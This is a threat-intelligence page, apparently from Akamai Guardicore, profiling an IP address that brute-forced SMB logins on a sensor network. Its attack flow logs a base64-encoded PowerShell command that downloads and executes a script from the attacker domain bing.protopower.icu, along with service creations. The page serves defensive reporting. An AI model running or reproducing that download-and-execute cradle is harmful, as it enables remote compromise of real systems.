Cyber Threat Intelligence

Discover malicious IPs and domains with Akamai Guardicore Segmentation

IP Address: 103.104.181.136Malicious

IP Address: 103.104.181.136Malicious

This IP address attempted an attack on a machine in our threat sensors network

Threat Information

Role

Attacker, Scanner

Services Targeted

SMB

Tags

File Operation By CMD Successful SMB Login Service Start SMB Share Connect CMD IDS - A Network Trojan was detected SMB Service Creation PowerShell Access Suspicious Domain DNS Query SMB Brute Force Listening Scheduled Task Creation

Associated Attack Servers

bing.protopower.icu

Basic Information

IP Address

103.104.181.136

Domain

-

ISP

-

Country

India

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Akamai Guardicore Segmentation

2024-02-17

Last seen in Akamai Guardicore Segmentation

2024-02-26

What is Akamai Guardicore Segmentation
Akamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

IDS detected A Network Trojan was detected : Powershell Activity Over SMB - Likely Lateral Movement

IDS - A Network Trojan was detected

A user logged in using SMB with the following username: Administrator - Authentication policy: Reached Max Attempts (Part of a Brute Force Attempt)

Successful SMB Login SMB Brute Force

c:\windows\system32\services.exe installed and started as a service named QhWZ under service group None

Service Start Service Creation

The command line powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYgBpAG4AZwAuAHAAcgBvAHQAbwBwAG8AdwBlAHIALgBpAGMAdQAvAGMAbwBrADkALgBqAHMAJwApAA== was scheduled to run by modifying C:\Windows\System32\Tasks\AutFree

Process netsvcs Service Group started listening on ports: 65531 and 65532

Listening

A user logged in using SMB with the following username: Administrator - Authentication policy: Previously Approved User (Part of a Brute Force Attempt) 12 times

Successful SMB Login SMB Brute Force

c:\windows\system32\services.exe installed and started as a service named ZxQg under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named dCQi under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named rDjZ under service group None

Service Start Service Creation

PowerShell session started by c:\windows\system32\windowspowershell\v1.0\powershell.exe

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: bing.protopower.icu

DNS Query Access Suspicious Domain

c:\windows\system32\services.exe installed and started as a service named gLom under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named bzFh under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named mmQF under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named BNzS under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named KijL under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named QSDK under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named tUMf under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named NkIG under service group None

Service Start Service Creation

Connection was closed due to timeout